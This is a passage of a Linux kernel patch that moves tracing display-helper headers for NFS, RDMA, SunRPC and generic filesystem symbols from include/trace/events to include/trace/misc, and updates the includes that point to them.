+-TRACE_DEFINE_ENUM(NFS4ERR_REP_TOO_BIG);
+-TRACE_DEFINE_ENUM(NFS4ERR_REP_TOO_BIG_TO_CACHE);
+-TRACE_DEFINE_ENUM(NFS4ERR_REQ_TOO_BIG);
+-TRACE_DEFINE_ENUM(NFS4ERR_RESOURCE);
+-TRACE_DEFINE_ENUM(NFS4ERR_RESTOREFH);
+-TRACE_DEFINE_ENUM(NFS4ERR_RETRY_UNCACHED_REP);
+-TRACE_DEFINE_ENUM(NFS4ERR_RETURNCONFLICT);
+-TRACE_DEFINE_ENUM(NFS4ERR_ROFS);
+-TRACE_DEFINE_ENUM(NFS4ERR_SAME);
+-TRACE_DEFINE_ENUM(NFS4ERR_SHARE_DENIED);
+-TRACE_DEFINE_ENUM(NFS4ERR_SEQUENCE_POS);
+-TRACE_DEFINE_ENUM(NFS4ERR_SEQ_FALSE_RETRY);
+-TRACE_DEFINE_ENUM(NFS4ERR_SEQ_MISORDERED);
+-TRACE_DEFINE_ENUM(NFS4ERR_SERVERFAULT);
+-TRACE_DEFINE_ENUM(NFS4ERR_STALE);
+-TRACE_DEFINE_ENUM(NFS4ERR_STALE_CLIENTID);
+-TRACE_DEFINE_ENUM(NFS4ERR_STALE_STATEID);
+-TRACE_DEFINE_ENUM(NFS4ERR_SYMLINK);
+-TRACE_DEFINE_ENUM(NFS4ERR_TOOSMALL);
+-TRACE_DEFINE_ENUM(NFS4ERR_TOO_MANY_OPS);
+-TRACE_DEFINE_ENUM(NFS4ERR_UNKNOWN_LAYOUTTYPE);
+-TRACE_DEFINE_ENUM(NFS4ERR_UNSAFE_COMPOUND);
+-TRACE_DEFINE_ENUM(NFS4ERR_WRONGSEC);
+-TRACE_DEFINE_ENUM(NFS4ERR_WRONG_CRED);
+-TRACE_DEFINE_ENUM(NFS4ERR_WRONG_TYPE);
+-TRACE_DEFINE_ENUM(NFS4ERR_XDEV);
+-
+-TRACE_DEFINE_ENUM(NFS4ERR_RESET_TO_MDS);
+-TRACE_DEFINE_ENUM(NFS4ERR_RESET_TO_PNFS);
+-
+-#define show_nfs4_status(x) \
+-	__print_symbolic(x, \
+-		{ NFS4_OK,			"OK" }, \
+-		{ EPERM,			"EPERM" }, \
+-		{ ENOENT,			"ENOENT" }, \
+-		{ EIO,				"EIO" }, \
+-		{ ENXIO,			"ENXIO" }, \
+-		{ EACCES,			"EACCES" }, \
+-		{ EEXIST,			"EEXIST" }, \
+-		{ EXDEV,			"EXDEV" }, \
+-		{ ENOTDIR,			"ENOTDIR" }, \
+-		{ EISDIR,			"EISDIR" }, \
+-		{ EFBIG,			"EFBIG" }, \
+-		{ ENOSPC,			"ENOSPC" }, \
+-		{ EROFS,			"EROFS" }, \
+-		{ EMLINK,			"EMLINK" }, \
+-		{ ENAMETOOLONG,			"ENAMETOOLONG" }, \
+-		{ ENOTEMPTY,			"ENOTEMPTY" }, \
+-		{ EDQUOT,			"EDQUOT" }, \
+-		{ ESTALE,			"ESTALE" }, \
+-		{ EBADHANDLE,			"EBADHANDLE" }, \
+-		{ EBADCOOKIE,			"EBADCOOKIE" }, \
+-		{ ENOTSUPP,			"ENOTSUPP" }, \
+-		{ ETOOSMALL,			"ETOOSMALL" }, \
+-		{ EREMOTEIO,			"EREMOTEIO" }, \
+-		{ EBADTYPE,			"EBADTYPE" }, \
+-		{ EAGAIN,			"EAGAIN" }, \
+-		{ ELOOP,			"ELOOP" }, \
+-		{ EOPNOTSUPP,			"EOPNOTSUPP" }, \
+-		{ EDEADLK,			"EDEADLK" }, \
+-		{ ENOMEM,			"ENOMEM" }, \
+-		{ EKEYEXPIRED,			"EKEYEXPIRED" }, \
+-		{ ETIMEDOUT,			"ETIMEDOUT" }, \
+-		{ ERESTARTSYS,			"ERESTARTSYS" }, \
+-		{ ECONNREFUSED,			"ECONNREFUSED" }, \
+-		{ ECONNRESET,			"ECONNRESET" }, \
+-		{ ENETUNREACH,			"ENETUNREACH" }, \
+-		{ EHOSTUNREACH,			"EHOSTUNREACH" }, \
+-		{ EHOSTDOWN,			"EHOSTDOWN" }, \
+-		{ EPIPE,			"EPIPE" }, \
+-		{ EPFNOSUPPORT,			"EPFNOSUPPORT" }, \
+-		{ EPROTONOSUPPORT,		"EPROTONOSUPPORT" }, \
+-		{ NFS4ERR_ACCESS,		"ACCESS" }, \
+-		{ NFS4ERR_ATTRNOTSUPP,		"ATTRNOTSUPP" }, \
+-		{ NFS4ERR_ADMIN_REVOKED,	"ADMIN_REVOKED" }, \
+-		{ NFS4ERR_BACK_CHAN_BUSY,	"BACK_CHAN_BUSY" }, \
+-		{ NFS4ERR_BADCHAR,		"BADCHAR" }, \
+-		{ NFS4ERR_BADHANDLE,		"BADHANDLE" }, \
+-		{ NFS4ERR_BADIOMODE,		"BADIOMODE" }, \
+-		{ NFS4ERR_BADLAYOUT,		"BADLAYOUT" }, \
+-		{ NFS4ERR_BADLABEL,		"BADLABEL" }, \
+-		{ NFS4ERR_BADNAME,		"BADNAME" }, \
+-		{ NFS4ERR_BADOWNER,		"BADOWNER" }, \
+-		{ NFS4ERR_BADSESSION,		"BADSESSION" }, \
+-		{ NFS4ERR_BADSLOT,		"BADSLOT" }, \
+-		{ NFS4ERR_BADTYPE,		"BADTYPE" }, \
+-		{ NFS4ERR_BADXDR,		"BADXDR" }, \
+-		{ NFS4ERR_BAD_COOKIE,		"BAD_COOKIE" }, \
+-		{ NFS4ERR_BAD_HIGH_SLOT,	"BAD_HIGH_SLOT" }, \
+-		{ NFS4ERR_BAD_RANGE,		"BAD_RANGE" }, \
+-		{ NFS4ERR_BAD_SEQID,		"BAD_SEQID" }, \
+-		{ NFS4ERR_BAD_SESSION_DIGEST,	"BAD_SESSION_DIGEST" }, \
+-		{ NFS4ERR_BAD_STATEID,		"BAD_STATEID" }, \
+-		{ NFS4ERR_CB_PATH_DOWN,		"CB_PATH_DOWN" }, \
+-		{ NFS4ERR_CLID_INUSE,		"CLID_INUSE" }, \
+-		{ NFS4ERR_CLIENTID_BUSY,	"CLIENTID_BUSY" }, \
+-		{ NFS4ERR_COMPLETE_ALREADY,	"COMPLETE_ALREADY" }, \
+-		{ NFS4ERR_CONN_NOT_BOUND_TO_SESSION, "CONN_NOT_BOUND_TO_SESSION" }, \
+-		{ NFS4ERR_DEADLOCK,		"DEADLOCK" }, \
+-		{ NFS4ERR_DEADSESSION,		"DEAD_SESSION" }, \
+-		{ NFS4ERR_DELAY,		"DELAY" }, \
+-		{ NFS4ERR_DELEG_ALREADY_WANTED,	"DELEG_ALREADY_WANTED" }, \
+-		{ NFS4ERR_DELEG_REVOKED,	"DELEG_REVOKED" }, \
+-		{ NFS4ERR_DENIED,		"DENIED" }, \
+-		{ NFS4ERR_DIRDELEG_UNAVAIL,	"DIRDELEG_UNAVAIL" }, \
+-		{ NFS4ERR_DQUOT,		"DQUOT" }, \
+-		{ NFS4ERR_ENCR_ALG_UNSUPP,	"ENCR_ALG_UNSUPP" }, \
+-		{ NFS4ERR_EXIST,		"EXIST" }, \
+-		{ NFS4ERR_EXPIRED,		"EXPIRED" }, \
+-		{ NFS4ERR_FBIG,			"FBIG" }, \
+-		{ NFS4ERR_FHEXPIRED,		"FHEXPIRED" }, \
+-		{ NFS4ERR_FILE_OPEN,		"FILE_OPEN" }, \
+-		{ NFS4ERR_GRACE,		"GRACE" }, \
+-		{ NFS4ERR_HASH_ALG_UNSUPP,	"HASH_ALG_UNSUPP" }, \
+-		{ NFS4ERR_INVAL,		"INVAL" }, \
+-		{ NFS4ERR_IO,			"IO" }, \
+-		{ NFS4ERR_ISDIR,		"ISDIR" }, \
+-		{ NFS4ERR_LAYOUTTRYLATER,	"LAYOUTTRYLATER" }, \
+-		{ NFS4ERR_LAYOUTUNAVAILABLE,	"LAYOUTUNAVAILABLE" }, \
+-		{ NFS4ERR_LEASE_MOVED,		"LEASE_MOVED" }, \
+-		{ NFS4ERR_LOCKED,		"LOCKED" }, \
+-		{ NFS4ERR_LOCKS_HELD,		"LOCKS_HELD" }, \
+-		{ NFS4ERR_LOCK_RANGE,		"LOCK_RANGE" }, \
+-		{ NFS4ERR_MINOR_VERS_MISMATCH,	"MINOR_VERS_MISMATCH" }, \
+-		{ NFS4ERR_MLINK,		"MLINK" }, \
+-		{ NFS4ERR_MOVED,		"MOVED" }, \
+-		{ NFS4ERR_NAMETOOLONG,		"NAMETOOLONG" }, \
+-		{ NFS4ERR_NOENT,		"NOENT" }, \
+-		{ NFS4ERR_NOFILEHANDLE,		"NOFILEHANDLE" }, \
+-		{ NFS4ERR_NOMATCHING_LAYOUT,	"NOMATCHING_LAYOUT" }, \
+-		{ NFS4ERR_NOSPC,		"NOSPC" }, \
+-		{ NFS4ERR_NOTDIR,		"NOTDIR" }, \
+-		{ NFS4ERR_NOTEMPTY,		"NOTEMPTY" }, \
+-		{ NFS4ERR_NOTSUPP,		"NOTSUPP" }, \
+-		{ NFS4ERR_NOT_ONLY_OP,		"NOT_ONLY_OP" }, \
+-		{ NFS4ERR_NOT_SAME,		"NOT_SAME" }, \
+-		{ NFS4ERR_NO_GRACE,		"NO_GRACE" }, \
+-		{ NFS4ERR_NXIO,			"NXIO" }, \
+-		{ NFS4ERR_OLD_STATEID,		"OLD_STATEID" }, \
+-		{ NFS4ERR_OPENMODE,		"OPENMODE" }, \
+-		{ NFS4ERR_OP_ILLEGAL,		"OP_ILLEGAL" }, \
+-		{ NFS4ERR_OP_NOT_IN_SESSION,	"OP_NOT_IN_SESSION" }, \
+-		{ NFS4ERR_PERM,			"PERM" }, \
+-		{ NFS4ERR_PNFS_IO_HOLE,		"PNFS_IO_HOLE" }, \
+-		{ NFS4ERR_PNFS_NO_LAYOUT,	"PNFS_NO_LAYOUT" }, \
+-		{ NFS4ERR_RECALLCONFLICT,	"RECALLCONFLICT" }, \
+-		{ NFS4ERR_RECLAIM_BAD,		"RECLAIM_BAD" }, \
+-		{ NFS4ERR_RECLAIM_CONFLICT,	"RECLAIM_CONFLICT" }, \
+-		{ NFS4ERR_REJECT_DELEG,		"REJECT_DELEG" }, \
+-		{ NFS4ERR_REP_TOO_BIG,		"REP_TOO_BIG" }, \
+-		{ NFS4ERR_REP_TOO_BIG_TO_CACHE,	"REP_TOO_BIG_TO_CACHE" }, \
+-		{ NFS4ERR_REQ_TOO_BIG,		"REQ_TOO_BIG" }, \
+-		{ NFS4ERR_RESOURCE,		"RESOURCE" }, \
+-		{ NFS4ERR_RESTOREFH,		"RESTOREFH" }, \
+-		{ NFS4ERR_RETRY_UNCACHED_REP,	"RETRY_UNCACHED_REP" }, \
+-		{ NFS4ERR_RETURNCONFLICT,	"RETURNCONFLICT" }, \
+-		{ NFS4ERR_ROFS,			"ROFS" }, \
+-		{ NFS4ERR_SAME,			"SAME" }, \
+-		{ NFS4ERR_SHARE_DENIED,		"SHARE_DENIED" }, \
+-		{ NFS4ERR_SEQUENCE_POS,		"SEQUENCE_POS" }, \
+-		{ NFS4ERR_SEQ_FALSE_RETRY,	"SEQ_FALSE_RETRY" }, \
+-		{ NFS4ERR_SEQ_MISORDERED,	"SEQ_MISORDERED" }, \
+-		{ NFS4ERR_SERVERFAULT,		"SERVERFAULT" }, \
+-		{ NFS4ERR_STALE,		"STALE" }, \
+-		{ NFS4ERR_STALE_CLIENTID,	"STALE_CLIENTID" }, \
+-		{ NFS4ERR_STALE_STATEID,	"STALE_STATEID" }, \
+-		{ NFS4ERR_SYMLINK,		"SYMLINK" }, \
+-		{ NFS4ERR_TOOSMALL,		"TOOSMALL" }, \
+-		{ NFS4ERR_TOO_MANY_OPS,		"TOO_MANY_OPS" }, \
+-		{ NFS4ERR_UNKNOWN_LAYOUTTYPE,	"UNKNOWN_LAYOUTTYPE" }, \
+-		{ NFS4ERR_UNSAFE_COMPOUND,	"UNSAFE_COMPOUND" }, \
+-		{ NFS4ERR_WRONGSEC,		"WRONGSEC" }, \
+-		{ NFS4ERR_WRONG_CRED,		"WRONG_CRED" }, \
+-		{ NFS4ERR_WRONG_TYPE,		"WRONG_TYPE" }, \
+-		{ NFS4ERR_XDEV,			"XDEV" }, \
+-		/* ***** Internal to Linux NFS client ***** */ \
+-		{ NFS4ERR_RESET_TO_MDS,		"RESET_TO_MDS" }, \
+-		{ NFS4ERR_RESET_TO_PNFS,	"RESET_TO_PNFS" })
+-
+-#define show_nfs4_verifier(x) \
+-	__print_hex_str(x, NFS4_VERIFIER_SIZE)
+-
+-TRACE_DEFINE_ENUM(IOMODE_READ);
+-TRACE_DEFINE_ENUM(IOMODE_RW);
+-TRACE_DEFINE_ENUM(IOMODE_ANY);
+-
+-#define show_pnfs_layout_iomode(x) \
+-	__print_symbolic(x, \
+-		{ IOMODE_READ,			"READ" }, \
+-		{ IOMODE_RW,			"RW" }, \
+-		{ IOMODE_ANY,			"ANY" })
+-
+-#define show_nfs4_seq4_status(x) \
+-	__print_flags(x, "|", \
+-		{ SEQ4_STATUS_CB_PATH_DOWN,		"CB_PATH_DOWN" }, \
+-		{ SEQ4_STATUS_CB_GSS_CONTEXTS_EXPIRING,	"CB_GSS_CONTEXTS_EXPIRING" }, \
+-		{ SEQ4_STATUS_CB_GSS_CONTEXTS_EXPIRED,	"CB_GSS_CONTEXTS_EXPIRED" }, \
+-		{ SEQ4_STATUS_EXPIRED_ALL_STATE_REVOKED, "EXPIRED_ALL_STATE_REVOKED" }, \
+-		{ SEQ4_STATUS_EXPIRED_SOME_STATE_REVOKED, "EXPIRED_SOME_STATE_REVOKED" }, \
+-		{ SEQ4_STATUS_ADMIN_STATE_REVOKED,	"ADMIN_STATE_REVOKED" }, \
+-		{ SEQ4_STATUS_RECALLABLE_STATE_REVOKED,	"RECALLABLE_STATE_REVOKED" }, \
+-		{ SEQ4_STATUS_LEASE_MOVED,		"LEASE_MOVED" }, \
+-		{ SEQ4_STATUS_RESTART_RECLAIM_NEEDED,	"RESTART_RECLAIM_NEEDED" }, \
+-		{ SEQ4_STATUS_CB_PATH_DOWN_SESSION,	"CB_PATH_DOWN_SESSION" }, \
+-		{ SEQ4_STATUS_BACKCHANNEL_FAULT,	"BACKCHANNEL_FAULT" })
+diff --git a/include/trace/events/rdma.h b/include/trace/events/rdma.h
+deleted file mode 100644
+index 81bb454fc2888..0000000000000
+--- a/include/trace/events/rdma.h
++++ /dev/null
+@@ -1,168 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Copyright (c) 2017 Oracle.  All rights reserved.
+- */
+-
+-/*
+- * enum ib_event_type, from include/rdma/ib_verbs.h
+- */
+-#define IB_EVENT_LIST				\
+-	ib_event(CQ_ERR)			\
+-	ib_event(QP_FATAL)			\
+-	ib_event(QP_REQ_ERR)			\
+-	ib_event(QP_ACCESS_ERR)			\
+-	ib_event(COMM_EST)			\
+-	ib_event(SQ_DRAINED)			\
+-	ib_event(PATH_MIG)			\
+-	ib_event(PATH_MIG_ERR)			\
+-	ib_event(DEVICE_FATAL)			\
+-	ib_event(PORT_ACTIVE)			\
+-	ib_event(PORT_ERR)			\
+-	ib_event(LID_CHANGE)			\
+-	ib_event(PKEY_CHANGE)			\
+-	ib_event(SM_CHANGE)			\
+-	ib_event(SRQ_ERR)			\
+-	ib_event(SRQ_LIMIT_REACHED)		\
+-	ib_event(QP_LAST_WQE_REACHED)		\
+-	ib_event(CLIENT_REREGISTER)		\
+-	ib_event(GID_CHANGE)			\
+-	ib_event_end(WQ_FATAL)
+-
+-#undef ib_event
+-#undef ib_event_end
+-
+-#define ib_event(x)		TRACE_DEFINE_ENUM(IB_EVENT_##x);
+-#define ib_event_end(x)		TRACE_DEFINE_ENUM(IB_EVENT_##x);
+-
+-IB_EVENT_LIST
+-
+-#undef ib_event
+-#undef ib_event_end
+-
+-#define ib_event(x)		{ IB_EVENT_##x, #x },
+-#define ib_event_end(x)		{ IB_EVENT_##x, #x }
+-
+-#define rdma_show_ib_event(x) \
+-		__print_symbolic(x, IB_EVENT_LIST)
+-
+-/*
+- * enum ib_wc_status type, from include/rdma/ib_verbs.h
+- */
+-#define IB_WC_STATUS_LIST			\
+-	ib_wc_status(SUCCESS)			\
+-	ib_wc_status(LOC_LEN_ERR)		\
+-	ib_wc_status(LOC_QP_OP_ERR)		\
+-	ib_wc_status(LOC_EEC_OP_ERR)		\
+-	ib_wc_status(LOC_PROT_ERR)		\
+-	ib_wc_status(WR_FLUSH_ERR)		\
+-	ib_wc_status(MW_BIND_ERR)		\
+-	ib_wc_status(BAD_RESP_ERR)		\
+-	ib_wc_status(LOC_ACCESS_ERR)		\
+-	ib_wc_status(REM_INV_REQ_ERR)		\
+-	ib_wc_status(REM_ACCESS_ERR)		\
+-	ib_wc_status(REM_OP_ERR)		\
+-	ib_wc_status(RETRY_EXC_ERR)		\
+-	ib_wc_status(RNR_RETRY_EXC_ERR)		\
+-	ib_wc_status(LOC_RDD_VIOL_ERR)		\
+-	ib_wc_status(REM_INV_RD_REQ_ERR)	\
+-	ib_wc_status(REM_ABORT_ERR)		\
+-	ib_wc_status(INV_EECN_ERR)		\
+-	ib_wc_status(INV_EEC_STATE_ERR)		\
+-	ib_wc_status(FATAL_ERR)			\
+-	ib_wc_status(RESP_TIMEOUT_ERR)		\
+-	ib_wc_status_end(GENERAL_ERR)
+-
+-#undef ib_wc_status
+-#undef ib_wc_status_end
+-
+-#define ib_wc_status(x)		TRACE_DEFINE_ENUM(IB_WC_##x);
+-#define ib_wc_status_end(x)	TRACE_DEFINE_ENUM(IB_WC_##x);
+-
+-IB_WC_STATUS_LIST
+-
+-#undef ib_wc_status
+-#undef ib_wc_status_end
+-
+-#define ib_wc_status(x)		{ IB_WC_##x, #x },
+-#define ib_wc_status_end(x)	{ IB_WC_##x, #x }
+-
+-#define rdma_show_wc_status(x) \
+-		__print_symbolic(x, IB_WC_STATUS_LIST)
+-
+-/*
+- * enum ib_cm_event_type, from include/rdma/ib_cm.h
+- */
+-#define IB_CM_EVENT_LIST			\
+-	ib_cm_event(REQ_ERROR)			\
+-	ib_cm_event(REQ_RECEIVED)		\
+-	ib_cm_event(REP_ERROR)			\
+-	ib_cm_event(REP_RECEIVED)		\
+-	ib_cm_event(RTU_RECEIVED)		\
+-	ib_cm_event(USER_ESTABLISHED)		\
+-	ib_cm_event(DREQ_ERROR)			\
+-	ib_cm_event(DREQ_RECEIVED)		\
+-	ib_cm_event(DREP_RECEIVED)		\
+-	ib_cm_event(TIMEWAIT_EXIT)		\
+-	ib_cm_event(MRA_RECEIVED)		\
+-	ib_cm_event(REJ_RECEIVED)		\
+-	ib_cm_event(LAP_ERROR)			\
+-	ib_cm_event(LAP_RECEIVED)		\
+-	ib_cm_event(APR_RECEIVED)		\
+-	ib_cm_event(SIDR_REQ_ERROR)		\
+-	ib_cm_event(SIDR_REQ_RECEIVED)		\
+-	ib_cm_event_end(SIDR_REP_RECEIVED)
+-
+-#undef ib_cm_event
+-#undef ib_cm_event_end
+-
+-#define ib_cm_event(x)		TRACE_DEFINE_ENUM(IB_CM_##x);
+-#define ib_cm_event_end(x)	TRACE_DEFINE_ENUM(IB_CM_##x);
+-
+-IB_CM_EVENT_LIST
+-
+-#undef ib_cm_event
+-#undef ib_cm_event_end
+-
+-#define ib_cm_event(x)		{ IB_CM_##x, #x },
+-#define ib_cm_event_end(x)	{ IB_CM_##x, #x }
+-
+-#define rdma_show_ib_cm_event(x) \
+-		__print_symbolic(x, IB_CM_EVENT_LIST)
+-
+-/*
+- * enum rdma_cm_event_type, from include/rdma/rdma_cm.h
+- */
+-#define RDMA_CM_EVENT_LIST			\
+-	rdma_cm_event(ADDR_RESOLVED)		\
+-	rdma_cm_event(ADDR_ERROR)		\
+-	rdma_cm_event(ROUTE_RESOLVED)		\
+-	rdma_cm_event(ROUTE_ERROR)		\
+-	rdma_cm_event(CONNECT_REQUEST)		\
+-	rdma_cm_event(CONNECT_RESPONSE)		\
+-	rdma_cm_event(CONNECT_ERROR)		\
+-	rdma_cm_event(UNREACHABLE)		\
+-	rdma_cm_event(REJECTED)			\
+-	rdma_cm_event(ESTABLISHED)		\
+-	rdma_cm_event(DISCONNECTED)		\
+-	rdma_cm_event(DEVICE_REMOVAL)		\
+-	rdma_cm_event(MULTICAST_JOIN)		\
+-	rdma_cm_event(MULTICAST_ERROR)		\
+-	rdma_cm_event(ADDR_CHANGE)		\
+-	rdma_cm_event_end(TIMEWAIT_EXIT)
+-
+-#undef rdma_cm_event
+-#undef rdma_cm_event_end
+-
+-#define rdma_cm_event(x)	TRACE_DEFINE_ENUM(RDMA_CM_EVENT_##x);
+-#define rdma_cm_event_end(x)	TRACE_DEFINE_ENUM(RDMA_CM_EVENT_##x);
+-
+-RDMA_CM_EVENT_LIST
+-
+-#undef rdma_cm_event
+-#undef rdma_cm_event_end
+-
+-#define rdma_cm_event(x)	{ RDMA_CM_EVENT_##x, #x },
+-#define rdma_cm_event_end(x)	{ RDMA_CM_EVENT_##x, #x }
+-
+-#define rdma_show_cm_event(x) \
+-		__print_symbolic(x, RDMA_CM_EVENT_LIST)
+diff --git a/include/trace/events/rpcgss.h b/include/trace/events/rpcgss.h
+index c9048f3e471bb..3f121eed369e8 100644
+--- a/include/trace/events/rpcgss.h
++++ b/include/trace/events/rpcgss.h
+@@ -13,7 +13,7 @@
+ 
+ #include <linux/tracepoint.h>
+ 
+-#include <trace/events/sunrpc_base.h>
++#include <trace/misc/sunrpc.h>
+ 
+ /**
+  ** GSS-API related trace events
+diff --git a/include/trace/events/rpcrdma.h b/include/trace/events/rpcrdma.h
+index fcd3b3f1020a6..8f461e04e5f09 100644
+--- a/include/trace/events/rpcrdma.h
++++ b/include/trace/events/rpcrdma.h
+@@ -15,8 +15,8 @@
+ #include <linux/tracepoint.h>
+ #include <rdma/ib_cm.h>
+ 
+-#include <trace/events/rdma.h>
+-#include <trace/events/sunrpc_base.h>
++#include <trace/misc/rdma.h>
++#include <trace/misc/sunrpc.h>
+ 
+ /**
+  ** Event classes
+diff --git a/include/trace/events/sunrpc.h b/include/trace/events/sunrpc.h
+index f48f2ab9d238b..ffe2679a13ced 100644
+--- a/include/trace/events/sunrpc.h
++++ b/include/trace/events/sunrpc.h
+@@ -14,7 +14,7 @@
+ #include <linux/net.h>
+ #include <linux/tracepoint.h>
+ 
+-#include <trace/events/sunrpc_base.h>
++#include <trace/misc/sunrpc.h>
+ 
+ TRACE_DEFINE_ENUM(SOCK_STREAM);
+ TRACE_DEFINE_ENUM(SOCK_DGRAM);
+diff --git a/include/trace/events/sunrpc_base.h b/include/trace/events/sunrpc_base.h
+deleted file mode 100644
+index 588557d07ea82..0000000000000
+--- a/include/trace/events/sunrpc_base.h
++++ /dev/null
+@@ -1,18 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Copyright (c) 2021 Oracle and/or its affiliates.
+- *
+- * Common types and format specifiers for sunrpc.
+- */
+-
+-#if !defined(_TRACE_SUNRPC_BASE_H)
+-#define _TRACE_SUNRPC_BASE_H
+-
+-#include <linux/tracepoint.h>
+-
+-#define SUNRPC_TRACE_PID_SPECIFIER	"%08x"
+-#define SUNRPC_TRACE_CLID_SPECIFIER	"%08x"
+-#define SUNRPC_TRACE_TASK_SPECIFIER \
+-	"task:" SUNRPC_TRACE_PID_SPECIFIER "@" SUNRPC_TRACE_CLID_SPECIFIER
+-
+-#endif /* _TRACE_SUNRPC_BASE_H */
+diff --git a/include/trace/misc/fs.h b/include/trace/misc/fs.h
+new file mode 100644
+index 0000000000000..738b97f22f365
+--- /dev/null
++++ b/include/trace/misc/fs.h
+@@ -0,0 +1,122 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Display helpers for generic filesystem items
++ *
++ * Author: Chuck Lever <chuck.lever@oracle.com>
++ *
++ * Copyright (c) 2020, Oracle and/or its affiliates.
++ */
++
++#include <linux/fs.h>
++
++#define show_fs_dirent_type(x) \
++	__print_symbolic(x, \
++		{ DT_UNKNOWN,		"UNKNOWN" }, \
++		{ DT_FIFO,		"FIFO" }, \
++		{ DT_CHR,		"CHR" }, \
++		{ DT_DIR,		"DIR" }, \
++		{ DT_BLK,		"BLK" }, \
++		{ DT_REG,		"REG" }, \
++		{ DT_LNK,		"LNK" }, \
++		{ DT_SOCK,		"SOCK" }, \
++		{ DT_WHT,		"WHT" })
++
++#define show_fs_fcntl_open_flags(x) \
++	__print_flags(x, "|", \
++		{ O_WRONLY,		"O_WRONLY" }, \
++		{ O_RDWR,		"O_RDWR" }, \
++		{ O_CREAT,		"O_CREAT" }, \
++		{ O_EXCL,		"O_EXCL" }, \
++		{ O_NOCTTY,		"O_NOCTTY" }, \
++		{ O_TRUNC,		"O_TRUNC" }, \
++		{ O_APPEND,		"O_APPEND" }, \
++		{ O_NONBLOCK,		"O_NONBLOCK" }, \
++		{ O_DSYNC,		"O_DSYNC" }, \
++		{ O_DIRECT,		"O_DIRECT" }, \
++		{ O_LARGEFILE,		"O_LARGEFILE" }, \
++		{ O_DIRECTORY,		"O_DIRECTORY" }, \
++		{ O_NOFOLLOW,		"O_NOFOLLOW" }, \
++		{ O_NOATIME,		"O_NOATIME" }, \
++		{ O_CLOEXEC,		"O_CLOEXEC" })
++
++#define __fmode_flag(x)	{ (__force unsigned long)FMODE_##x, #x }
++#define show_fs_fmode_flags(x) \
++	__print_flags(x, "|", \
++		__fmode_flag(READ), \
++		__fmode_flag(WRITE), \
++		__fmode_flag(EXEC))
++
++#ifdef CONFIG_64BIT
++#define show_fs_fcntl_cmd(x) \
++	__print_symbolic(x, \
++		{ F_DUPFD,		"DUPFD" }, \
++		{ F_GETFD,		"GETFD" }, \
++		{ F_SETFD,		"SETFD" }, \
++		{ F_GETFL,		"GETFL" }, \
++		{ F_SETFL,		"SETFL" }, \
++		{ F_GETLK,		"GETLK" }, \
++		{ F_SETLK,		"SETLK" }, \
++		{ F_SETLKW,		"SETLKW" }, \
++		{ F_SETOWN,		"SETOWN" }, \
++		{ F_GETOWN,		"GETOWN" }, \
++		{ F_SETSIG,		"SETSIG" }, \
++		{ F_GETSIG,		"GETSIG" }, \
++		{ F_SETOWN_EX,		"SETOWN_EX" }, \
++		{ F_GETOWN_EX,		"GETOWN_EX" }, \
++		{ F_GETOWNER_UIDS,	"GETOWNER_UIDS" }, \
++		{ F_OFD_GETLK,		"OFD_GETLK" }, \
++		{ F_OFD_SETLK,		"OFD_SETLK" }, \
++		{ F_OFD_SETLKW,		"OFD_SETLKW" })
++#else /* CONFIG_64BIT */
++#define show_fs_fcntl_cmd(x) \
++	__print_symbolic(x, \
++		{ F_DUPFD,		"DUPFD" }, \
++		{ F_GETFD,		"GETFD" }, \
++		{ F_SETFD,		"SETFD" }, \
++		{ F_GETFL,		"GETFL" }, \
++		{ F_SETFL,		"SETFL" }, \
++		{ F_GETLK,		"GETLK" }, \
++		{ F_SETLK,		"SETLK" }, \
++		{ F_SETLKW,		"SETLKW" }, \
++		{ F_SETOWN,		"SETOWN" }, \
++		{ F_GETOWN,		"GETOWN" }, \
++		{ F_SETSIG,		"SETSIG" }, \
++		{ F_GETSIG,		"GETSIG" }, \
++		{ F_GETLK64,		"GETLK64" }, \
++		{ F_SETLK64,		"SETLK64" }, \
++		{ F_SETLKW64,		"SETLKW64" }, \
++		{ F_SETOWN_EX,		"SETOWN_EX" }, \
++		{ F_GETOWN_EX,		"GETOWN_EX" }, \
++		{ F_GETOWNER_UIDS,	"GETOWNER_UIDS" }, \
++		{ F_OFD_GETLK,		"OFD_GETLK" }, \
++		{ F_OFD_SETLK,		"OFD_SETLK" }, \
++		{ F_OFD_SETLKW,		"OFD_SETLKW" })
++#endif /* CONFIG_64BIT */
++
++#define show_fs_fcntl_lock_type(x) \
++	__print_symbolic(x, \
++		{ F_RDLCK,		"RDLCK" }, \
++		{ F_WRLCK,		"WRLCK" }, \
++		{ F_UNLCK,		"UNLCK" })
++
++#define show_fs_lookup_flags(flags) \
++	__print_flags(flags, "|", \
++		{ LOOKUP_FOLLOW,	"FOLLOW" }, \
++		{ LOOKUP_DIRECTORY,	"DIRECTORY" }, \
++		{ LOOKUP_AUTOMOUNT,	"AUTOMOUNT" }, \
++		{ LOOKUP_EMPTY,		"EMPTY" }, \
++		{ LOOKUP_DOWN,		"DOWN" }, \
++		{ LOOKUP_MOUNTPOINT,	"MOUNTPOINT" }, \
++		{ LOOKUP_REVAL,		"REVAL" }, \
++		{ LOOKUP_RCU,		"RCU" }, \
++		{ LOOKUP_OPEN,		"OPEN" }, \
++		{ LOOKUP_CREATE,	"CREATE" }, \
++		{ LOOKUP_EXCL,		"EXCL" }, \
++		{ LOOKUP_RENAME_TARGET,	"RENAME_TARGET" }, \
++		{ LOOKUP_PARENT,	"PARENT" }, \
++		{ LOOKUP_NO_SYMLINKS,	"NO_SYMLINKS" }, \
++		{ LOOKUP_NO_MAGICLINKS,	"NO_MAGICLINKS" }, \
++		{ LOOKUP_NO_XDEV,	"NO_XDEV" }, \
++		{ LOOKUP_BENEATH,	"BENEATH" }, \
++		{ LOOKUP_IN_ROOT,	"IN_ROOT" }, \
++		{ LOOKUP_CACHED,	"CACHED" })
+diff --git a/include/trace/misc/nfs.h b/include/trace/misc/nfs.h
+new file mode 100644
+index 0000000000000..0d9d48dca38a8
+--- /dev/null
++++ b/include/trace/misc/nfs.h
+@@ -0,0 +1,387 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Display helpers for NFS protocol elements
++ *
++ * Author: Chuck Lever <chuck.lever@oracle.com>
++ *
++ * Copyright (c) 2020, Oracle and/or its affiliates.
++ */
++
++#include <linux/nfs.h>
++#include <linux/nfs4.h>
++#include <uapi/linux/nfs.h>
++
++TRACE_DEFINE_ENUM(NFS_OK);
